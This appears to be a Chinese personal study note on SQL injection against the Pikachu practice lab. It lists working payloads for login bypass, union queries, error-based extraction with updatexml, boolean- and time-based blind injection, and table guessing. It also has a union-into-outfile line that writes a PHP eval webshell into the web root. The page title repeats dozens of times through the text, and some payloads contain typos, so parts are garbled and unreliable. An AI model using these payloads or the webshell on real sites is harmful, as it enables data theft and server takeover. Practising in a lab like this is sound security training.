D6 pikachu SQL Iuject(updatexml() extractvalue() floor() 盲注 based boolean baesd time 一句话木马 暴力破解)

目录

首先

select a,b from c where id=1

xxx' or 1=1#'

xxxx%' or 1=1#

' 可以检测是否可以sql注入

a 'union select database(),user()## 通过union查询信息

a' order by 3#查看第三行 看到底有没有这些数据

updatexml() extractvalue() floor()

盲注

一句话木马

暴力破解


首先

很早就接触了SQL注入 对它还是买油兴趣的 一定要自己有兴趣才好 当时的感觉是 哇 竟然可以这样看数据 也太好了 所以这个兴趣一直也没有减弱 现在再来温习温习

select a,b from c where id=1

D6 pikachu SQL Iuject(updatexml() extractvalue() floor() 盲注 based boolean baesd time 一句话木马 暴力破解)D6 pikachu SQL Iuject(updatexml() extractvalue() floor() 盲注 based boolean baesd time 一句话木马 暴力破解)D6 pikachu SQL Iuject(updatexml() extractvalue() floor() 盲注 based boolean baesd time 一句话木马 暴力破解)D6 pikachu SQL Iuject(updatexml() extractvalue() floor() 盲注 based boolean baesd time 一句话木马 暴力破解)D6 pikachu SQL Iuject(updatexml() extractvalue() floor() 盲注 based boolean baesd time 一句话木马 暴力破解)D6 pikachu SQL Iuject(updatexml() extractvalue() floor() 盲注 based boolean baesd time 一句话木马 暴力破解)D6 pikachu SQL Iuject(updatexml() extractvalue() floor() 盲注 based boolean baesd time 一句话木马 暴力破解)

xxx' or 1=1#'

xxxx%' or 1=1#

D6 pikachu SQL Iuject(updatexml() extractvalue() floor() 盲注 based boolean baesd time 一句话木马 暴力破解)D6 pikachu SQL Iuject(updatexml() extractvalue() floor() 盲注 based boolean baesd time 一句话木马 暴力破解)D6 pikachu SQL Iuject(updatexml() extractvalue() floor() 盲注 based boolean baesd time 一句话木马 暴力破解)D6 pikachu SQL Iuject(updatexml() extractvalue() floor() 盲注 based boolean baesd time 一句话木马 暴力破解)

' 可以检测是否可以sql注入

D6 pikachu SQL Iuject(updatexml() extractvalue() floor() 盲注 based boolean baesd time 一句话木马 暴力破解)D6 pikachu SQL Iuject(updatexml() extractvalue() floor() 盲注 based boolean baesd time 一句话木马 暴力破解)

a 'union select database(),user()## 通过union查询D6 pikachu SQL Iuject(updatexml() extractvalue() floor() 盲注 based boolean baesd time 一句话木马 暴力破解)D6 pikachu SQL Iuject(updatexml() extractvalue() floor() 盲注 based boolean baesd time 一句话木马 暴力破解)

a' order by 3#查看第三行 看到底有没有这些数据

D6 pikachu SQL Iuject(updatexml() extractvalue() floor() 盲注 based boolean baesd time 一句话木马 暴力破解)D6 pikachu SQL Iuject(updatexml() extractvalue() floor() 盲注 based boolean baesd time 一句话木马 暴力破解)

报错获取信息:是通过指定的函数来制造报错,从而从报错信息中获取设定的信息。
条件就是后台没有屏蔽数据库报错信息,在语法出现错误时,会输出在前端。

updatexml() extractvalue() floor()

updatexml():是mysql对xml文档数据进行查询和修改的XPATH函数
extractvalue():是mysql对xml文档进行数据进行查询和修改的XPATH函数
floor():是mysql中用来取整的函数

kobe' and updatexml(1,concat(0x7e,database()),0)#

D6 pikachu SQL Iuject(updatexml() extractvalue() floor() 盲注 based boolean baesd time 一句话木马 暴力破解)D6 pikachu SQL Iuject(updatexml() extractvalue() floor() 盲注 based boolean baesd time 一句话木马 暴力破解)D6 pikachu SQL Iuject(updatexml() extractvalue() floor() 盲注 based boolean baesd time 一句话木马 暴力破解)D6 pikachu SQL Iuject(updatexml() extractvalue() floor() 盲注 based boolean baesd time 一句话木马 暴力破解)

盲注

based boolean:m没有报错信息 实惠显示0或1 再正确的输入下 输入and1=1/and1=2发现可以判断

由这个select ascii(substr(database(),1,1))>150;得
kobe' and ascii(substr(database(),1,1))=10#

D6 pikachu SQL Iuject(updatexml() extractvalue() floor() 盲注 based boolean baesd time 一句话木马 暴力破解)D6 pikachu SQL Iuject(updatexml() extractvalue() floor() 盲注 based boolean baesd time 一句话木马 暴力破解)D6 pikachu SQL Iuject(updatexml() extractvalue() floor() 盲注 based boolean baesd time 一句话木马 暴力破解)D6 pikachu SQL Iuject(updatexml() extractvalue() floor() 盲注 based boolean baesd time 一句话木马 暴力破解)D6 pikachu SQL Iuject(updatexml() extractvalue() floor() 盲注 based boolean baesd time 一句话木马 暴力破解)D6 pikachu SQL Iuject(updatexml() extractvalue() floor() 盲注 based boolean baesd time 一句话木马 暴力破解)D6 pikachu SQL Iuject(updatexml() extractvalue() floor() 盲注 based boolean baesd time 一句话木马 暴力破解)D6 pikachu SQL Iuject(updatexml() extractvalue() floor() 盲注 based boolean baesd time 一句话木马 暴力破解)

baesd time:
基于时间的延迟
kobe'and if(substr(database(),1,1))='p',sleep(5),null)#

D6 pikachu SQL Iuject(updatexml() extractvalue() floor() 盲注 based boolean baesd time 一句话木马 暴力破解)D6 pikachu SQL Iuject(updatexml() extractvalue() floor() 盲注 based boolean baesd time 一句话木马 暴力破解)D6 pikachu SQL Iuject(updatexml() extractvalue() floor() 盲注 based boolean baesd time 一句话木马 暴力破解)

一句话木马

一种短小精悍的木马客户端 隐蔽性好 功能强大

前提条件:
需要知道远程目录 
需要远程目录有写权限 
需要数据库开始secure_file_priv

获取操作系统的权限:
kobe' union select "<?php @eval($_GET['test'])?>",2 into outfile "/var/www/html/1.php"

暴力破解

暴力破解表名和列名称:
kobe' and exists(select * from aa)#
boke' and exists(select * from users)#

D6 pikachu SQL Iuject(updatexml() extractvalue() floor() 盲注 based boolean baesd time 一句话木马 暴力破解)D6 pikachu SQL Iuject(updatexml() extractvalue() floor() 盲注 based boolean baesd time 一句话木马 暴力破解)D6 pikachu SQL Iuject(updatexml() extractvalue() floor() 盲注 based boolean baesd time 一句话木马 暴力破解)